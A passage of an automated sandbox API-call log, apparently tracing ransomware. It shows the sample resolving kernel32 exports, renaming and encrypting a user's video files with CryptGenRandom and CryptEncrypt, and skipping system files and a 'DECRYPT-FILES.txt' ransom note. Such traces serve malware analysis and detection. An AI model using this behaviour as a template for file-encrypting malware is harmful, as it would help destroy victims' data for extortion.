returned="CreateTimerQueueTimer" [0087.481] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.481] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.481] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.481] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.481] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.481] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.481] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.482] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.482] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.482] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.482] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.482] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.482] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.482] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.482] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.482] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.482] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.482] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.482] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.482] lstrlenA (lpString="DELETEATOM") returned 10 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.482] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.482] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.482] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.482] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.482] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.482] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.483] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.483] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.483] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.483] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.483] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.483] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.483] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.483] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.483] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.483] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.483] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.483] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.483] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.483] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.483] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.483] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.483] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.483] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.483] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.483] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.484] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.484] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.484] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.484] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.484] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.484] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.484] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.484] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.484] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.484] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.484] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.484] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.484] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.484] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.484] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.484] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.484] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.485] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.485] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\PTN5D3Sq_RRMjfg.flv") returned 73 [0087.485] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\PTN5D3Sq_RRMjfg.flv.At9Rgv") returned 80 [0087.485] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\PTN5D3Sq_RRMjfg.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ptn5d3sq_rrmjfg.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\PTN5D3Sq_RRMjfg.flv.At9Rgv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ptn5d3sq_rrmjfg.flv.at9rgv"), dwFlags=0x0) returned 1 [0087.486] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.486] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.486] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.486] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x569589a0, ftCreationTime.dwHighDateTime=0x1d4d58e, ftLastAccessTime.dwLowDateTime=0x2d86d450, ftLastAccessTime.dwHighDateTime=0x1d4d49a, ftLastWriteTime.dwLowDateTime=0x2d86d450, ftLastWriteTime.dwHighDateTime=0x1d4d49a, nFileSizeHigh=0x0, nFileSizeLow=0x1849b, dwReserved0=0x0, dwReserved1=0x0, cFileName="rqiWEc.flv", cAlternateFileName="")) returned 1 [0087.486] lstrcmpiW (lpString1="rqiWEc.flv", lpString2="DECRYPT-FILES.txt") returned 1 [0087.486] lstrcmpiW (lpString1="rqiWEc.flv", lpString2="autorun.inf") returned 1 [0087.486] lstrcmpiW (lpString1="rqiWEc.flv", lpString2="boot.ini") returned 1 [0087.487] lstrcmpiW (lpString1="rqiWEc.flv", lpString2="desktop.ini") returned 1 [0087.487] lstrcmpiW (lpString1="rqiWEc.flv", lpString2="ntuser.dat") returned 1 [0087.487] lstrcmpiW (lpString1="rqiWEc.flv", lpString2="iconcache.db") returned 1 [0087.487] lstrcmpiW (lpString1="rqiWEc.flv", lpString2="bootsect.bak") returned 1 [0087.487] lstrcmpiW (lpString1="rqiWEc.flv", lpString2="ntuser.dat.log") returned 1 [0087.487] lstrcmpiW (lpString1="rqiWEc.flv", lpString2="thumbs.db") returned -1 [0087.487] lstrcmpiW (lpString1="rqiWEc.flv", lpString2="Bootfont.bin") returned 1 [0087.487] lstrlenW (lpString="rqiWEc.flv") returned 10 [0087.487] lstrcmpiW (lpString1="flv", lpString2="lnk") returned -1 [0087.487] lstrcmpiW (lpString1="flv", lpString2="exe") returned 1 [0087.487] lstrcmpiW (lpString1="flv", lpString2="sys") returned -1 [0087.487] lstrcmpiW (lpString1="flv", lpString2="dll") returned 1 [0087.487] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.487] lstrlenW (lpString="rqiWEc.flv") returned 10 [0087.487] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.487] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="rqiWEc.flv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\rqiWEc.flv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\rqiWEc.flv" [0087.487] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.487] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\rqiWEc.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\rqiwec.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.487] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=99483) returned 1 [0087.488] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.488] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.488] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.488] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.488] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.488] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.488] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0087.490] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.490] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.491] CloseHandle (hObject=0x42c) returned 1 [0087.492] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.492] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.492] CloseHandle (hObject=0x0) returned 0 [0087.492] CloseHandle (hObject=0x428) returned 1 [0087.492] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.493] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.493] GetTickCount () returned 0x114e512 [0087.493] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.493] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.493] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.494] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.494] lstrlenA (lpString="kernel32.dll") returned 12 [0087.494] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.494] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.494] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.494] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.494] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.494] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.494] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.494] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.494] lstrlenA (lpString="ADDATOMA") returned 8 [0087.494] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.494] lstrlenA (lpString="ADDATOMW") returned 8 [0087.494] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.494] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.494] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.494] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.494] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.494] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.494] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.494] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.494] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.495] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.495] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.495] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.495] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.495] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.495] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.495] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.495] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.495] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.495] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.495] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.495] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.495] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.495] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.495] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.495] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.495] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.495] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.495] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.496] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.496] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.496] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: 